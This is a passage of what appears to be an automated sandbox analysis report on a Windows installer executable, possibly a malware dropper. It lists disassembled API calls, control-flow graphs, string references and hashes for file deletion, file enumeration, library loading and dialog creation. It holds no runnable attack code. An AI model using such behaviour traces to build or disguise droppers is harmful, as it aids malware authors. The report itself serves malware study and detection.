                                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                  • API String ID: 900638850-1230650788
                                                                                                                                                  • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                                  • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                                  • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                                  • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 744 405772-405798 call 405a3d 747 4057b1-4057b8 744->747 748 40579a-4057ac DeleteFileW 744->748 750 4057ba-4057bc 747->750 751 4057cb-4057db call 405eea 747->751 749 40592e-405932 748->749 752 4057c2-4057c5 750->752 753 4058dc-4058e1 750->753 757 4057ea-4057eb call 405981 751->757 758 4057dd-4057e8 lstrcatW 751->758 752->751 752->753 753->749 756 4058e3-4058e6 753->756 759 4058f0-4058f8 call 40622d 756->759 760 4058e8-4058ee 756->760 761 4057f0-4057f4 757->761 758->761 759->749 767 4058fa-40590e call 405935 call 40572a 759->767 760->749 764 405800-405806 lstrcatW 761->764 765 4057f6-4057fe 761->765 768 40580b-405827 lstrlenW FindFirstFileW 764->768 765->764 765->768 784 405910-405913 767->784 785 405926-405929 call 405194 767->785 770 4058d1-4058d5 768->770 771 40582d-405835 768->771 770->753 775 4058d7 770->775 772 405855-405869 call 405eea 771->772 773 405837-40583f 771->773 786 405880-40588b call 40572a 772->786 787 40586b-405873 772->787 776 405841-405849 773->776 777 4058b4-4058c4 FindNextFileW 773->777 775->753 776->772 780 40584b-405853 776->780 777->771 783 4058ca-4058cb FindClose 777->783 780->772 780->777 783->770 784->760 788 405915-405924 call 405194 call 405d84 784->788 785->749 797 4058ac-4058af call 405194 786->797 798 40588d-405890 786->798 787->777 789 405875-40587e call 405772 787->789 788->749 789->777 797->777 801 405892-4058a2 call 405194 call 405d84 798->801 802 4058a4-4058aa 798->802 801->777 802->777
                                                                                                                                                  APIs
                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 0040579B
                                                                                                                                                  • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 004057E3
                                                                                                                                                  • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 00405806
                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 0040580C
                                                                                                                                                  • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 0040581C
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                                                                                                  • "C:\Users\user\Desktop\________.exe", xrefs: 0040577B
                                                                                                                                                  • \*.*, xrefs: 004057DD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\________.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                  • API String ID: 2035342205-1994770991
                                                                                                                                                  • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                                  • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                                  • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                                  • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                                  • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                                                  • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                                  • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75572EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406238
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                  • String ID: WB
                                                                                                                                                  • API String ID: 2295610775-2854515933
                                                                                                                                                  • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                                  • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                                                  • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                                  • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                                  • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                                  • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                                                                  • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                                  • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 247 403919-40392a call 405db7 241->247 248 40392f-403935 lstrcatW 241->248 251 40393a-403963 call 403b8a call 405a3d 242->251 247->248 248->251 256 4039f5-4039fd call 405a3d 251->256 257 403969-40396e 251->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 259 403974-40399c call 405db7 257->259 259->256 265 40399e-4039a2 259->265 267 403ab1-403ab9 call 40140b 263->267 268 403a32-403a62 RegisterClassW 263->268 264->263 269 4039b4-4039c0 lstrlenW 265->269 270 4039a4-4039b1 call 405962 265->270 281 403ac3-403ace call 403b8a 267->281 282 403abb-403abe 267->282 271 403b80 268->271 272 403a68-403aac SystemParametersInfoW CreateWindowExW 268->272 276 4039c2-4039d0 lstrcmpiW 269->276 277 4039e8-4039f0 call 405935 call 405eea 269->277 270->269 274 403b82-403b89 271->274 272->267 276->277 280 4039d2-4039dc GetFileAttributesW 276->280 277->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->274 284->277 285->277 285->284 294 403af3-403af8 LoadLibraryW 291->294 295 403afa-403b0c GetClassInfoW 291->295 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 294->295 296 403b24-403b47 DialogBoxParamW call 40140b 295->296 297 403b0e-403b1e GetClassInfoW RegisterClassW 295->297 302 403b4c-403b55 call 403804 296->302 297->296 300->282 303 403b6d-403b74 call 40140b 300->303 301->271 302->274 303->282
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                                    • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                                    • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                                  • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75573420,00000000,"C:\Users\user\Desktop\________.exe"), ref: 00403935
                                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\foreslaaende), ref: 00403A1C
                                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                                  • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                                  • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\________.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                  • API String ID: 914957316-946982534
                                                                                                                                                  • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                                  • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                                  • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                                  • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 323 403cb6-403cbc 316->323 324 403c9e-403cb0 ShowWindow 316->324 328 403e67-403e82 318->328 320 403e24-403e2f call 401389 319->320 321 403e55-403e57 319->321 320->321 342 403e31-403e50 SendMessageW 320->342 321->318 327 4040fc 321->327 329 403cd8-403cdb 323->329 330 403cbe-403cd3 DestroyWindow 323->330 324->323 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 345 403e97-403ea2 334->345 346 4040ba-4040d3 DestroyWindow EndDialog 334->346 336->327 343 4040e1-4040e7 336->343 338->335 340 403d97-403da5 call 404196 339->340 341 403cfa-403d0b GetDlgItem 339->341 340->335 347 403d2a-403d2d 341->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 341->348 342->335 343->327 350 4040e9-4040f2 ShowWindow 343->350 345->346 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 345->351 346->336 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->340 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->340 361->356 366 403d52-403d58 call 40140b 362->366 367 403d67-403d70 call 40140b 362->367 377 403d5e 366->377 367->340 376 403d72-403d7c 367->376 376->377 377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                                  • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                                                  • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                                                  • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                  • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                                  • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                                  • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                                  • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 431 403013-403018 424->431 432 402f48-402f4b 424->432 427 402e63 425->427 428 402e65-402e72 call 4032f9 425->428 427->428 436 402e78-402e7e 428->436 437 402fcf-402fd7 call 402d1a 428->437 431->417 434 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 432->434 435 402f4d-402f65 call 40330f call 4032f9 432->435 461 402fc5-402fca 434->461 462 402fd9-403009 call 40330f call 403062 434->462 435->431 464 402f6b-402f71 435->464 441 402e80-402e98 call 405b11 436->441 442 402efe-402f02 436->442 437->431 446 402f0b-402f11 441->446 457 402e9a-402ea1 441->457 445 402f04-402f0a call 402d1a 442->445 442->446 445->446 453 402f13-402f21 call 406302 446->453 454 402f24-402f2e 446->454 453->454 454->424 454->425 457->446 463 402ea3-402eaa 457->463 461->417 472 40300e-403011 462->472 463->446 465 402eac-402eb3 463->465 464->431 464->434 465->446 467 402eb5-402ebc 465->467 467->446 469 402ebe-402ede 467->469 469->431 471 402ee4-402ee8 469->471 473 402ef0-402ef8 471->473 474 402eea-402eee 471->474 472->431 475 40301a-40302b 472->475 473->446 476 402efa-402efc 473->476 474->424 474->473 477 403033-403038 475->477 478 40302d 475->478 476->446 479 403039-40303f 477->479 478->477 479->479 480 403041-403059 call 405b11 479->480 480->417
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\________.exe,00000400), ref: 00402DEC
                                                                                                                                                    • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                                    • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
